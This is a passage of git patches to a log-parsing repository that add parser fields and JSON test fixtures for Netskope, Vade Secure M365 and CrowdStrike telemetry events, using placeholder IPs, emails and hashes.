"\u00cele-de-France", + "timezone": "Europe/Paris" + }, + "ip": "5.6.7.8" + }, + "url": { + "original": "test.example.com", + "path": "test.example.com" + }, + "user": { + "domain": "mail.fr", + "email": "john.doe@mail.fr", + "name": "john.doe" + }, + "user_agent": { + "name": "Chrome" + } + } +} \ No newline at end of file diff --git a/Netskope/netskope_events/tests/test_nspolicy_log.json b/Netskope/netskope_events/tests/test_nspolicy_log.json index 25513a172..d0d9ed304 100644 --- a/Netskope/netskope_events/tests/test_nspolicy_log.json +++ b/Netskope/netskope_events/tests/test_nspolicy_log.json @@ -43,7 +43,8 @@ "md5": "68b329da9893e34099c7d8ad5cb9c940" }, "mime_type": "image/gif", - "name": "giphy2.gif" + "name": "giphy2.gif", + "size": 204299 }, "host": { "name": "TEST-1111111", diff --git a/Netskope/netskope_events/tests/test_nspolicy_upload.json b/Netskope/netskope_events/tests/test_nspolicy_upload.json new file mode 100644 index 000000000..b05f61a9d --- /dev/null +++ b/Netskope/netskope_events/tests/test_nspolicy_upload.json @@ -0,0 +1,120 @@ +{ + "input": { + "message": "{\"_id\":\"2d7a3c19cf913179146454b6\",\"access_method\":\"Client\",\"activity\":\"Upload\",\"alert\":\"no\",\"app\":\"App\",\"app_session_id\":1234567890,\"appcategory\":\"Remote Access\",\"browser\":\"CHROME\",\"browser_session_id\":1111111111111111111,\"browser_version\":\"6.0;\",\"category\":\"Remote Access\",\"cci\":73,\"ccl\":\"medium\",\"connection_id\":0,\"count\":1,\"data_type\":\"application/octet-stream\",\"device\":\"Windows Device\",\"device_classification\":\"managed\",\"dst_country\":\"CZ\",\"dst_latitude\":50.0883,\"dst_location\":\"Prague\",\"dst_longitude\":14.4124,\"dst_region\":\"Prague\",\"dst_timezone\":\"Europe/Prague\",\"dst_zipcode\":\"110 00\",\"dstip\":\"1.2.3.4\",\"dstport\":80,\"file_size\":24,\"file_type\":\"File Type Not Detected\",\"hostname\":\"PC-HOST01\",\"ja3\":\"NotAvailable\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"md5\":\"68b329da9893e34099c7d8ad5cb9c940\",\"netskope_pop\":\"FR-PAR3\",\"object\":\"object.txt\",\"object_type\":\"File\",\"organization_unit\":\"\",\"os\":\"Windows 10\",\"os_version\":\"Windows NT 10.0\",\"other_categories\":[\"Remote Access\"],\"page\":\"test.example.com\",\"page_site\":\"app\",\"policy_id\":\"22222222222222222222222222222222 2024-10-30 13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":4444444444444444444,\"severity\":\"unknown\",\"site\":\"App\",\"src_country\":\"FR\",\"src_latitude\":48.6673,\"src_location\":\"Paris\",\"src_longitude\":2.3476,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:04:00 2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75001\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731575086,\"traffic_type\":\"CloudApp\",\"transaction_id\":5555555555555555555,\"type\":\"nspolicy\",\"universal_connector\":\"yes\",\"ur_normalized\":\"jdoe@mail.com\",\"url\":\"url.app.com/object2.txt\",\"user\":\"JDOE@mail.com\",\"useragent\":\"Mozilla/4.0 (compatible; CHROME 6.0; DynGate)\",\"userip\":\"10.20.30.40\",\"userkey\":\"JDOE@mail.com\",\"serial\":\"\",\"numbytes\":0,\"exposure\":\"\",\"server_bytes\":0,\"web_universal_connector\":\"\",\"logintype\":\"\",\"alert_type\":\"\",\"from_user\":\"\",\"dlp_scan_failed\":\"\",\"dlp_rule\":\"\",\"fromlogs\":\"\",\"justification_type\":\"\",\"tss_mode\":\"\",\"user_category\":\"\",\"src_geoip_src\":0,\"CononicalName\":\"\",\"shared_with\":\"\",\"channel_id\":\"\",\"dlp_mail_parent_id\":\"\",\"custom_attr\":{},\"sha256\":\"\",\"resp_cnt\":0,\"custom_connector\":\"\",\"orignal_file_path\":\"\",\"to_user\":\"\",\"internal_collaborator_count\":0,\"owner\":\"\",\"appsuite\":\"\",\"org\":\"\",\"dsthost\":\"\",\"tss_fail_reason\":\"\",\"audit_type\":\"\",\"parent_id\":\"\",\"data_center\":\"\",\"loginurl\":\"\",\"mime_type\":\"\",\"from_user_category\":\"\",\"file_path\":\"\",\"modified\":0,\"referer\":\"\",\"dlp_profile\":\"\",\"object_id\":\"\",\"true_obj_type\":\"\",\"tss_scan_failed\":\"\",\"managementID\":\"\",\"dst_geoip_src\":0,\"dlp_rule_severity\":\"\",\"conn_duration\":0,\"policy\":\"\",\"netskope_activity\":\"\",\"audit_category\":\"\",\"smtp_to\":[],\"nsdeviceuid\":\"\",\"justification_reason\":\"\",\"suppression_start_time\":0,\"dlp_is_unique_count\":\"\",\"dlp_parent_id\":0,\"dlp_fail_reason\":\"\",\"userPrincipalName\":\"\",\"dlp_file\":\"\",\"dlp_incident_id\":0,\"sanctioned_instance\":\"\",\"suppression_key\":\"\",\"retro_scan_name\":\"\",\"instance_id\":\"\",\"true_obj_category\":\"\",\"action\":\"\",\"sessionid\":\"\",\"file_lang\":\"\",\"log_file_name\":\"\",\"notify_template\":\"\",\"sAMAccountName\":\"\",\"ext_labels\":[],\"instance\":\"\",\"user_id\":\"\",\"workspace\":\"\",\"dlp_rule_count\":0,\"app_activity\":\"\",\"suppression_end_time\":0,\"title\":\"\",\"scan_type\":\"\",\"dlp_unique_count\":0,\"total_collaborator_count\":0,\"client_bytes\":0,\"req_cnt\":0,\"user_confidence_index\":0,\"workspace_id\":\"\"}", + "sekoiaio": { + "intake": { + "dialect": "Netskope", + "dialect_uuid": "de9ca004-991e-4f5c-89c5-e075f3fb3216" + } + } + }, + "expected": { + "message": "{\"_id\":\"2d7a3c19cf913179146454b6\",\"access_method\":\"Client\",\"activity\":\"Upload\",\"alert\":\"no\",\"app\":\"App\",\"app_session_id\":1234567890,\"appcategory\":\"Remote Access\",\"browser\":\"CHROME\",\"browser_session_id\":1111111111111111111,\"browser_version\":\"6.0;\",\"category\":\"Remote Access\",\"cci\":73,\"ccl\":\"medium\",\"connection_id\":0,\"count\":1,\"data_type\":\"application/octet-stream\",\"device\":\"Windows Device\",\"device_classification\":\"managed\",\"dst_country\":\"CZ\",\"dst_latitude\":50.0883,\"dst_location\":\"Prague\",\"dst_longitude\":14.4124,\"dst_region\":\"Prague\",\"dst_timezone\":\"Europe/Prague\",\"dst_zipcode\":\"110 00\",\"dstip\":\"1.2.3.4\",\"dstport\":80,\"file_size\":24,\"file_type\":\"File Type Not Detected\",\"hostname\":\"PC-HOST01\",\"ja3\":\"NotAvailable\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"md5\":\"68b329da9893e34099c7d8ad5cb9c940\",\"netskope_pop\":\"FR-PAR3\",\"object\":\"object.txt\",\"object_type\":\"File\",\"organization_unit\":\"\",\"os\":\"Windows 10\",\"os_version\":\"Windows NT 10.0\",\"other_categories\":[\"Remote Access\"],\"page\":\"test.example.com\",\"page_site\":\"app\",\"policy_id\":\"22222222222222222222222222222222 2024-10-30 13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":4444444444444444444,\"severity\":\"unknown\",\"site\":\"App\",\"src_country\":\"FR\",\"src_latitude\":48.6673,\"src_location\":\"Paris\",\"src_longitude\":2.3476,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:04:00 2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75001\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731575086,\"traffic_type\":\"CloudApp\",\"transaction_id\":5555555555555555555,\"type\":\"nspolicy\",\"universal_connector\":\"yes\",\"ur_normalized\":\"jdoe@mail.com\",\"url\":\"url.app.com/object2.txt\",\"user\":\"JDOE@mail.com\",\"useragent\":\"Mozilla/4.0 (compatible; CHROME 6.0; DynGate)\",\"userip\":\"10.20.30.40\",\"userkey\":\"JDOE@mail.com\",\"serial\":\"\",\"numbytes\":0,\"exposure\":\"\",\"server_bytes\":0,\"web_universal_connector\":\"\",\"logintype\":\"\",\"alert_type\":\"\",\"from_user\":\"\",\"dlp_scan_failed\":\"\",\"dlp_rule\":\"\",\"fromlogs\":\"\",\"justification_type\":\"\",\"tss_mode\":\"\",\"user_category\":\"\",\"src_geoip_src\":0,\"CononicalName\":\"\",\"shared_with\":\"\",\"channel_id\":\"\",\"dlp_mail_parent_id\":\"\",\"custom_attr\":{},\"sha256\":\"\",\"resp_cnt\":0,\"custom_connector\":\"\",\"orignal_file_path\":\"\",\"to_user\":\"\",\"internal_collaborator_count\":0,\"owner\":\"\",\"appsuite\":\"\",\"org\":\"\",\"dsthost\":\"\",\"tss_fail_reason\":\"\",\"audit_type\":\"\",\"parent_id\":\"\",\"data_center\":\"\",\"loginurl\":\"\",\"mime_type\":\"\",\"from_user_category\":\"\",\"file_path\":\"\",\"modified\":0,\"referer\":\"\",\"dlp_profile\":\"\",\"object_id\":\"\",\"true_obj_type\":\"\",\"tss_scan_failed\":\"\",\"managementID\":\"\",\"dst_geoip_src\":0,\"dlp_rule_severity\":\"\",\"conn_duration\":0,\"policy\":\"\",\"netskope_activity\":\"\",\"audit_category\":\"\",\"smtp_to\":[],\"nsdeviceuid\":\"\",\"justification_reason\":\"\",\"suppression_start_time\":0,\"dlp_is_unique_count\":\"\",\"dlp_parent_id\":0,\"dlp_fail_reason\":\"\",\"userPrincipalName\":\"\",\"dlp_file\":\"\",\"dlp_incident_id\":0,\"sanctioned_instance\":\"\",\"suppression_key\":\"\",\"retro_scan_name\":\"\",\"instance_id\":\"\",\"true_obj_category\":\"\",\"action\":\"\",\"sessionid\":\"\",\"file_lang\":\"\",\"log_file_name\":\"\",\"notify_template\":\"\",\"sAMAccountName\":\"\",\"ext_labels\":[],\"instance\":\"\",\"user_id\":\"\",\"workspace\":\"\",\"dlp_rule_count\":0,\"app_activity\":\"\",\"suppression_end_time\":0,\"title\":\"\",\"scan_type\":\"\",\"dlp_unique_count\":0,\"total_collaborator_count\":0,\"client_bytes\":0,\"req_cnt\":0,\"user_confidence_index\":0,\"workspace_id\":\"\"}", + "event": { + "action": "Upload", + "category": [ + "network" + ], + "dataset": "nspolicy", + "duration": 0, + "kind": "event", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-14T09:04:46Z", + "destination": { + "address": "1.2.3.4", + "bytes": 0, + "geo": { + "city_name": "Prague", + "country_iso_code": "CZ", + "location": { + "lat": 50.0883, + "lon": 14.4124 + }, + "postal_code": "110 00", + "region_name": "Prague", + "timezone": "Europe/Prague" + }, + "ip": "1.2.3.4" + }, + "file": { + "hash": { + "md5": "68b329da9893e34099c7d8ad5cb9c940" + }, + "mime_type": "File Type Not Detected", + "name": "object.txt", + "size": 24 + }, + "host": { + "name": "PC-HOST01", + "os": { + "name": "Windows 10", + "platform": "windows", + "type": "windows", + "version": "Windows NT 10.0" + } + }, + "netskope": { + "events": { + "access_method": "Client", + "application": { + "category": "Remote Access", + "name": "App" + }, + "ccl": "medium" + } + }, + "network": { + "bytes": 0 + }, + "observer": { + "vendor": "Netskope" + }, + "related": { + "hash": [ + "68b329da9893e34099c7d8ad5cb9c940" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "JDOE" + ] + }, + "rule": { + "id": "22222222222222222222222222222222 2024-10-30 13:52:18.401518" + }, + "source": { + "address": "5.6.7.8", + "bytes": 0, + "geo": { + "city_name": "Paris", + "country_iso_code": "FR", + "location": { + "lat": 48.6673, + "lon": 2.3476 + }, + "postal_code": "75001", + "region_name": "\u00cele-de-France", + "timezone": "Europe/Paris" + }, + "ip": "5.6.7.8" + }, + "url": { + "original": "url.app.com/object2.txt", + "path": "url.app.com/object2.txt" + }, + "user": { + "domain": "mail.com", + "email": "JDOE@mail.com", + "name": "JDOE" + }, + "user_agent": { + "name": "CHROME", + "version": "6.0;" + } + } +} \ No newline at end of file diff --git a/Netskope/netskope_events/tests/test_user_alert.json b/Netskope/netskope_events/tests/test_user_alert.json index a882c2ac5..4c435b860 100644 --- a/Netskope/netskope_events/tests/test_user_alert.json +++ b/Netskope/netskope_events/tests/test_user_alert.json @@ -5,7 +5,7 @@ "expected": { "message": "{\n \"_id\": \"882049056ee9e069c1c329b7\",\n \"access_method\": \"Client\",\n \"action\": \"useralert\",\n \"activity\": \"Share\",\n \"alert\": \"yes\",\n \"app\": \"WeTransfer\",\n \"app_session_id\": 1111111111111111111,\n \"appcategory\": \"Cloud Storage\",\n \"browser\": \"Edge\",\n \"browser_session_id\": 2222222222222222222,\n \"browser_version\": \"108.0.1462.54\",\n \"category\": \"Cloud Storage\",\n \"cci\": 58,\n \"ccl\": \"low\",\n \"connection_id\": 3333333333333333333,\n \"count\": 1,\n \"device\": \"Windows Device\",\n \"device_classification\": \"unmanaged\",\n \"dst_country\": \"IE\",\n \"dst_geoip_src\": 2,\n \"dst_latitude\": 53.3379,\n \"dst_location\": \"Dublin\",\n \"dst_longitude\": -6.2591,\n \"dst_region\": \"Leinster\",\n \"dst_timezone\": \"Europe/Dublin\",\n \"dst_zipcode\": \"D02\",\n \"dstip\": \"108.128.91.183\",\n \"from_user\": \"jane.doe@example.org\",\n \"hostname\": \"TEST-1234\",\n \"managed_app\": \"no\",\n \"managementID\": \"99999999999999999999999999999999\",\n \"netskope_pop\": \"FR-PAR1\",\n \"notify_template\": \"useralert_justify.html\",\n \"nsdeviceuid\": \"BC848089-186A-4F2D-A26F-E5CC94C29E56\",\n \"object\": \"Client.exe\",\n \"object_type\": \"File\",\n \"organization_unit\": \"\",\n \"os\": \"Windows 11\",\n \"os_version\": \"Windows 11\",\n \"page\": \"wetransfer.com/\",\n \"page_site\": \"Web Background\",\n \"policy\": \"DO NOT CHANGE Educate Upload to Non-Corporate Storage\",\n \"policy_id\": \"99999999999999999999999999999999 2022-12-21 14:31:09.981853\",\n \"protocol\": \"HTTPS/2\",\n \"referer\": \"https://wetransfer.com/\",\n \"request_id\": 4444444444444444444,\n \"severity\": \"unknown\",\n \"site\": \"WeTransfer\",\n \"src_country\": \"FR\",\n \"src_geoip_src\": 2,\n \"src_latitude\": 48.11,\n \"src_location\": \"Rennes\",\n \"src_longitude\": -1.6744,\n \"src_region\": \"Brittany\",\n \"src_time\": \"Wed Dec 21 15:52:08 2022\",\n \"src_timezone\": \"Europe/Paris\",\n \"src_zipcode\": \"35000\",\n \"srcip\": \"4.3.2.1\",\n \"telemetry_app\": \"\",\n \"timestamp\": 1671634321,\n \"to_user\": \"a@a.fr\",\n \"traffic_type\": \"CloudApp\",\n \"transaction_id\": 4444444444444444444,\n \"type\": \"nspolicy\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"url\": \"wetransfer.com/api/v4/transfers/email\",\n \"user\": \"john.doe@example.org\",\n \"useragent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.54\",\n \"userip\": \"1.2.3.4\",\n \"userkey\": \"john.doe@example.org\",\n \"internal_collaborator_count\": 0,\n \"fromlogs\": \"\",\n \"dlp_incident_id\": 0,\n \"owner\": \"\",\n \"dlp_profile\": \"\",\n \"workspace\": \"\",\n \"user_id\": \"\",\n \"userPrincipalName\": \"\",\n \"true_obj_category\": \"\",\n \"dlp_is_unique_count\": \"\",\n \"orignal_file_path\": \"\",\n \"other_categories\": [],\n \"serial\": \"\",\n \"tss_mode\": \"\",\n \"conn_duration\": 0,\n \"from_user_category\": \"\",\n \"md5\": \"\",\n \"data_type\": \"\",\n \"title\": \"\",\n \"log_file_name\": \"\",\n \"dstport\": 0,\n \"exposure\": \"\",\n \"instance_id\": \"\",\n \"audit_category\": \"\",\n \"netskope_activity\": \"\",\n \"file_type\": \"\",\n \"total_collaborator_count\": 0,\n \"file_path\": \"\",\n \"modified\": 0,\n \"dlp_rule_count\": 0,\n \"suppression_end_time\": 0,\n \"CononicalName\": \"\",\n \"alert_type\": \"\",\n \"sanctioned_instance\": \"\",\n \"suppression_start_time\": 0,\n \"dlp_parent_id\": 0,\n \"true_obj_type\": \"\",\n \"dlp_mail_parent_id\": \"\",\n \"audit_type\": \"\",\n \"workspace_id\": \"\",\n \"dsthost\": \"\",\n \"web_universal_connector\": \"\",\n \"req_cnt\": 0,\n \"mime_type\": \"\",\n \"suppression_key\": \"\",\n \"scan_type\": \"\",\n \"shared_with\": \"\",\n \"client_bytes\": 0,\n \"object_id\": \"\",\n \"user_category\": \"\",\n \"dlp_rule\": \"\",\n \"parent_id\": \"\",\n \"sha256\": \"\",\n \"dlp_rule_severity\": \"\",\n \"logintype\": \"\",\n \"org\": \"\",\n \"dlp_unique_count\": 0,\n \"file_size\": 0,\n \"instance\": \"\",\n \"sAMAccountName\": \"\",\n \"resp_cnt\": 0,\n \"universal_connector\": \"\",\n \"numbytes\": 0,\n \"server_bytes\": 0,\n \"channel_id\": \"\",\n \"file_lang\": \"\",\n \"app_activity\": \"\",\n \"appsuite\": \"\",\n \"sessionid\": \"\",\n \"loginurl\": \"\",\n \"dlp_file\": \"\",\n \"data_center\": \"\",\n \"custom_connector\": \"\"\n}\n", "event": { - "action": "Share", + "action": "useralert", "category": [ "network" ], From dc3c4ff33c7a2ecedd7e1f28c5662b24f763efa0 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Tue, 19 Nov 2024 11:32:02 +0100 Subject: [PATCH 061/150] Improvement: Vade Secure M365 - Add parsed fields --- VadeSecure/vade_secure_m365/_meta/fields.yml | 5 ++ VadeSecure/vade_secure_m365/ingest/parser.yml | 5 ++ .../vade_secure_m365/tests/email_02.json | 61 +++++++++++++++ .../tests/email_with_attachment_02.json | 77 +++++++++++++++++++ 4 files changed, 148 insertions(+) create mode 100644 VadeSecure/vade_secure_m365/tests/email_02.json create mode 100644 VadeSecure/vade_secure_m365/tests/email_with_attachment_02.json diff --git a/VadeSecure/vade_secure_m365/_meta/fields.yml b/VadeSecure/vade_secure_m365/_meta/fields.yml index 1e4a81657..a3f60b15c 100644 --- a/VadeSecure/vade_secure_m365/_meta/fields.yml +++ b/VadeSecure/vade_secure_m365/_meta/fields.yml @@ -58,6 +58,11 @@ vadesecure.attachments: short: vadesecure.to_header type: array +vadesecure.auth_results_details: + description: Details of security protocols, mostly SPF, DKIM and DMARC. + name: vadesecure.auth_results_details + type: object + vadesecure.campaign.actions: description: The actions carried out for the remediation campaign. name: vadesecure.campaign.actions diff --git a/VadeSecure/vade_secure_m365/ingest/parser.yml b/VadeSecure/vade_secure_m365/ingest/parser.yml index 539de1df4..cbac9cd2d 100644 --- a/VadeSecure/vade_secure_m365/ingest/parser.yml +++ b/VadeSecure/vade_secure_m365/ingest/parser.yml @@ -56,6 +56,7 @@ stages: actions: - name: set set: + vadesecure.auth_results_details: "{{parse_json.message.auth_results_details}}" vadesecure.folder: "{{parse_json.message.folder}}" vadesecure.from_header: "{{parse_json.message.from_header}}" vadesecure.to_header: "{{parse_json.message.to_header}}" @@ -131,3 +132,7 @@ stages: - set: source.ip: "{{parse_json.message.sender_ip}}" filter: "{{parse_json.message.sender_ip| is_ipaddress}}" + + - set: + email.reply_to.address: "{{parse_json.message.reply_to_header}}" + filter: "{{parse_json.message.reply_to_header != ''}}" diff --git a/VadeSecure/vade_secure_m365/tests/email_02.json b/VadeSecure/vade_secure_m365/tests/email_02.json new file mode 100644 index 000000000..7b2c0ae83 --- /dev/null +++ b/VadeSecure/vade_secure_m365/tests/email_02.json @@ -0,0 +1,61 @@ +{ + "input": { + "message": "{\"id\": \"cs72a9b6r0glddhdfh7g\", \"date\": \"2024-10-15T08:17:41.776Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"jd@doe.fr\", \"from_header\": \"John Doe\", \"to\": \"alan.smithee@doe.fr\", \"to_header\": \"Alan.smithee@doe.fr\", \"subject\": \"Informations\", \"message_id\": \"\", \"urls\": [], \"attachments\": [], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 26875, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": \"user@company.com\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"none\", \"spf\": \"temperror\", \"dmarc\": \"fail\"}}", + "sekoiaio": { + "intake": { + "dialect": "Vade for M365", + "dialect_uuid": "e4a758fc-7620-49e6-b8ed-b7fb3d7fa232" + } + } + }, + "expected": { + "message": "{\"id\": \"cs72a9b6r0glddhdfh7g\", \"date\": \"2024-10-15T08:17:41.776Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"jd@doe.fr\", \"from_header\": \"John Doe\", \"to\": \"alan.smithee@doe.fr\", \"to_header\": \"Alan.smithee@doe.fr\", \"subject\": \"Informations\", \"message_id\": \"\", \"urls\": [], \"attachments\": [], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 26875, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": \"user@company.com\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"none\", \"spf\": \"temperror\", \"dmarc\": \"fail\"}}", + "event": { + "action": "nothing", + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "attachments": [], + "from": { + "address": "jd@doe.fr" + }, + "local_id": "cs72a9b6r0glddhdfh7g", + "message_id": "", + "reply_to": { + "address": "user@company.com" + }, + "subject": "Informations", + "to": { + "address": "alan.smithee@doe.fr" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "vadesecure": { + "attachments": [], + "auth_results_details": { + "dkim": "none", + "dmarc": "fail", + "spf": "temperror" + }, + "from_header": "John Doe", + "last_report_date": "0001-01-01T00:00:00Z", + "overdict": "clean", + "status": "LEGIT", + "to_header": "Alan.smithee@doe.fr", + "whitelist": "false" + } + } +} \ No newline at end of file diff --git a/VadeSecure/vade_secure_m365/tests/email_with_attachment_02.json b/VadeSecure/vade_secure_m365/tests/email_with_attachment_02.json new file mode 100644 index 000000000..679e24c56 --- /dev/null +++ b/VadeSecure/vade_secure_m365/tests/email_with_attachment_02.json @@ -0,0 +1,77 @@ +{ + "input": { + "message": "{\"id\": \"csb6q1pgfisg9knp1l5g\", \"date\": \"2024-10-21T15:02:31.64Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"john.doe@mail.fr\", \"from_header\": \"John DOE \", \"to\": \"alan.smithee@company.fr\", \"to_header\": \"Alan Smithee \", \"subject\": \"Re: Your mail\", \"message_id\": \"\", \"urls\": [{\"url\": \"http://www.company.fr/\"}], \"attachments\": [{\"id\": \"12345678901234567890\", \"filename\": \"image001.jpg\", \"extension\": \"jpg\", \"size\": 5130, \"hashes\": {\"md5\": \"7bc2b146a309acbff2da55e6b4124a82\", \"sha1\": \"299d5bf95adb52e640f9723c5f58b5a8e880be9b\", \"sha256\": \"288093f2981e53222135c94d1d6179a069d6e539daa86f10d65f86958f793368\", \"sha512\": \"7808b91ddf218cd9da382d42b2c5d07816964019976550f69aefe26182f6c324a5df8bafc9cd79167e09d4a339cfd33d5e7ba87342f459aae8e125fc64d42423\"}}], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 93072, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": \"\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"fail\", \"spf\": \"temperror\", \"dmarc\": \"none\"}}", + "sekoiaio": { + "intake": { + "dialect": "Vade for M365", + "dialect_uuid": "e4a758fc-7620-49e6-b8ed-b7fb3d7fa232" + } + } + }, + "expected": { + "message": "{\"id\": \"csb6q1pgfisg9knp1l5g\", \"date\": \"2024-10-21T15:02:31.64Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"john.doe@mail.fr\", \"from_header\": \"John DOE \", \"to\": \"alan.smithee@company.fr\", \"to_header\": \"Alan Smithee \", \"subject\": \"Re: Your mail\", \"message_id\": \"\", \"urls\": [{\"url\": \"http://www.company.fr/\"}], \"attachments\": [{\"id\": \"12345678901234567890\", \"filename\": \"image001.jpg\", \"extension\": \"jpg\", \"size\": 5130, \"hashes\": {\"md5\": \"7bc2b146a309acbff2da55e6b4124a82\", \"sha1\": \"299d5bf95adb52e640f9723c5f58b5a8e880be9b\", \"sha256\": \"288093f2981e53222135c94d1d6179a069d6e539daa86f10d65f86958f793368\", \"sha512\": \"7808b91ddf218cd9da382d42b2c5d07816964019976550f69aefe26182f6c324a5df8bafc9cd79167e09d4a339cfd33d5e7ba87342f459aae8e125fc64d42423\"}}], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 93072, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": \"\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"fail\", \"spf\": \"temperror\", \"dmarc\": \"none\"}}", + "event": { + "action": "nothing", + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "attachments": [ + { + "file": { + "extension": "jpg", + "hash": { + "md5": "7bc2b146a309acbff2da55e6b4124a82", + "sha1": "299d5bf95adb52e640f9723c5f58b5a8e880be9b", + "sha256": "288093f2981e53222135c94d1d6179a069d6e539daa86f10d65f86958f793368", + "sha512": "7808b91ddf218cd9da382d42b2c5d07816964019976550f69aefe26182f6c324a5df8bafc9cd79167e09d4a339cfd33d5e7ba87342f459aae8e125fc64d42423" + }, + "name": "image001.jpg", + "size": 5130 + } + } + ], + "from": { + "address": "john.doe@mail.fr" + }, + "local_id": "csb6q1pgfisg9knp1l5g", + "message_id": "", + "subject": "Re: Your mail", + "to": { + "address": "alan.smithee@company.fr" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "vadesecure": { + "attachments": [ + { + "filename": "image001.jpg", + "id": "12345678901234567890" + } + ], + "auth_results_details": { + "dkim": "fail", + "dmarc": "none", + "spf": "temperror" + }, + "from_header": "John DOE ", + "last_report_date": "0001-01-01T00:00:00Z", + "overdict": "clean", + "status": "LEGIT", + "to_header": "Alan Smithee ", + "whitelist": "false" + } + } +} \ No newline at end of file From cb5456827e5201fd75229cc4770a445a72738be0 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Tue, 19 Nov 2024 11:59:10 +0100 Subject: [PATCH 062/150] CrowdStrike telemetry: fix on parsing error --- CrowdStrike/crowdstrike-telemetry/_meta/fields.yml | 5 ----- CrowdStrike/crowdstrike-telemetry/ingest/parser.yml | 7 ++----- .../crowdstrike-telemetry/tests/telemetry_event_26.json | 5 ++++- 3 files changed, 6 insertions(+), 11 deletions(-) diff --git a/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml b/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml index 75e1b7434..a59b68006 100644 --- a/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml +++ b/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml @@ -1,8 +1,3 @@ -crowdstrike.base_filename: - description: Base Filename - name: crowdstrike.base_filename - type: keyword - crowdstrike.customer_id: description: Customer ID (cid) name: crowdstrike.customer_id diff --git a/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml b/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml index 03e9819e7..5d0069c0a 100644 --- a/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml +++ b/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml @@ -53,9 +53,6 @@ stages: "host.domain": "{{parsed_event.message.MachineDomain}}" "host.mac": "{{parsed_event.message.MAC}}" - - set: - crowdstrike.base_filename: "{{parsed_event.message.ContextBaseFileName}}" - set_registry_fields: actions: - set: @@ -180,9 +177,9 @@ stages: - set: "event.action": "{{parsed_event.message.event_simpleName}}" - "process.command_line": "{{parsed_event.message.CommandLine}}" + "process.command_line": "{{parsed_event.message.CommandLine or parsed_event.message.ContextBaseFileName}}" "process.executable": "{{parsed_event.message.ImageFileName}}" - "process.name": "{{parsed_event.message.ImageFileName | basename}}" + "process.name": "{{parsed_event.message.ImageFileName | basename or parsed_event.message.ContextBaseFileName}}" "process.thread.id": "{{parsed_event.message.SourceThreadId | int}}" "process.parent.name": "{{parsed_event.message.ParentBaseFileName}}" "process.parent.pid": "{{parsed_event.message.ParentProcessId}}" diff --git a/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json b/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json index 